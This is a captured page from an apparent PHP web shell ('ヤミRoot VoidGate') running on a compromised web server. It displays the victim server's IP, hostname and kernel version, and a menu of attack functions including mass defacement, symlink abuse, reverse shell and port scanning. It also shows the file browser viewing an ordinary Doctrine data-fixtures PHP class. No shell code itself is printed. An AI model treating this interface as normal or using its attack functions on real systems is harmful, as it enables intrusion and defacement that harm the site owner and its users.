ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
doctrine
/
data-fixtures
/
src
/
Executor
/
Viewing: PHPCRExecutor.php
<?php declare(strict_types=1); namespace Doctrine\Common\DataFixtures\Executor; use Doctrine\Common\DataFixtures\Purger\PHPCRPurger; use Doctrine\ODM\PHPCR\DocumentManagerInterface; use function method_exists; /** * Class responsible for executing data fixtures. */ class PHPCRExecutor extends AbstractExecutor { /** @var DocumentManagerInterface */ private $dm; /** * @param DocumentManagerInterface $dm manager instance used for persisting the fixtures * @param PHPCRPurger|null $purger to remove the current data if append is false */ public function __construct(DocumentManagerInterface $dm, ?PHPCRPurger $purger = null) { parent::__construct($dm); $this->dm = $dm; if ($purger === null) { return; } $purger->setDocumentManager($dm); $this->setPurger($purger); } /** @return DocumentManagerInterface */ public function getObjectManager() { return $this->dm; } /** @inheritDoc */ public function execute(array $fixtures, $append = false) { $that = $this; $function = static function ($dm) use ($append, $that, $fixtures) { if ($append === false) { $that->purge(); } foreach ($fixtures as $fixture) { $that->load($dm, $fixture); } }; if (method_exists($this->dm, 'transactional')) { $this->dm->transactional($function); } else { $function($this->dm); } } }
Coded With 💗 by
0x6ick